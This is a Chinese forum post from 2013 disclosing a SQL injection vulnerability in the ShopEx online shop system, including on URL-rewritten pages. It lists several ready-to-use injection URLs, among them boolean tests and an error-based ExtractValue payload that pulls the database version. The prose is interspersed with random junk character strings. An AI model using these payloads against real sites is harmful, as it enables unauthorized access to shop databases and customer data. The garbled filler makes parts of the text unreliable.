注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…$ D* _4 x0 z# B* |# a0 @: B
) O( _; r) l$ Y& {% j- V0 g
好吧,我扯远了~~
. k+ L; J c, A8 r& |9 s. `其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
4 D- U0 I, G( Y. }9 K5 Y" _, _+ g: W不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
$ g5 F. S1 |" K% U1 `6 _- f1 K: u$ p R7 C
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html" L; G+ @* K( ?; t O# D
. c, z2 i' x* p5 h/ ^
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
9 c. s; k0 K5 Y
( Z( Q3 h8 U- j9 I* ~7 w$ K2 e# ~http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html0 w3 E/ ?& X5 c/ ^/ V7 E
$ m. @9 f; J- Ghttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
3 |- ~# s" L& w& B
5 k5 W/ w, s& i4 W& a 4 j. f. b* P+ U7 l
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。' G9 @" u7 f A4 F/ G" R
如何注入就不多说了,10多年的东西了…不会也会了…
; v. ^) o/ K7 L& z9 T4 s" J
$ t! D; ]5 E }( ? |
发表于 2013-2-4 16:20:04
收藏
支持
反对